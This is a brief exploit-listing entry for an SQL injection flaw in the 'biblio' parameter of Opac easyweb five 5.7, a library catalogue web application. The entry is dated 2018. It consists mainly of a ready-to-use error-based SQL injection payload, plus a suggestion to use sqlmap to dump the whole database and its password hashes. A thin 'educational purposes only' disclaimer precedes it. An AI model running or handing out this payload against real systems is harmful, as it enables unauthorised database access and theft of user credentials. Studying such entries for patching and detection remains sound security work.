Opac easyweb five 5.7 biblio sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-10-02 |
Type : webapps |
Platform : php
This exploit / vulnerability Opac easyweb five 5.7 biblio sql injection is for educational purposes only and if it is used you will do on your own risk!
# You can use sqlmap for dump entire database and dumping hash
scelta=campi&&biblio=RT10AH' AND ROW(3677,8383)>(SELECT
COUNT(*),CONCAT(0x7176627a71,(SELECT
(ELT(3677=3677,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM (SELECT 8278 UNION
SELECT 2746 UNION SELECT 1668 UNION SELECT 1526)a GROUP BY x) AND
'CrYc'='CrYc&lang=